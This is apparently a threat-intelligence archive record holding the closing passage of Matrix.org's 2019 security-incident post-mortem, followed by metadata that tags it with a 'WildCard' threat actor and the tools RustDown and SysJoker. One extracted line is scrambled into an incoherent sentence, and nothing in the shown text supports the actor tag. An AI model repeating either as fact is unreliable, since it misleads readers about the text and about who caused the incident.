Morton for providing independent review of this post and our remediations, and everyone\r\nwho reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally\r\nthanks to the those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down\r\nmeanwhile to keep the rest of the project on track.\r\nOn which note, we’re going to go back to building decentralised communication protocols and reference implementations\r\nfor a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of\r\nextreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.\r\nGiven the new blog doesn't have comments yet, feel free to discuss the post over at HN.\r\nThe Foundation needs you\r\nThe Matrix.org Foundation is a non-profit and only relies on donations to operate. Its core mission is to maintain the Matrix\r\nSpecification, but it does much more than that.\r\nIt maintains the matrix.org homeserver and hosts several bridges for free. It fights for our collective rights to digital privacy\r\nand dignity.\r\nSupport us\r\nSource: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 10 of 10\n\ninfra - which is why In the interest of transparency it is taking a while to (and to try to get full parity with where give a sense of scale of we were before. the impact of the breach), here is the public-facing\nservice list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:\n  Page 4 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/"
	],
	"report_names": [
		"post-mortem-and-remediations-for-apr-11-security-incident"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0c05a3841c348868350653525245f9c18e80ce88.pdf",
		"text": "https://archive.orkl.eu/0c05a3841c348868350653525245f9c18e80ce88.txt",
		"img": "https://archive.orkl.eu/0c05a3841c348868350653525245f9c18e80ce88.jpg"
	}
}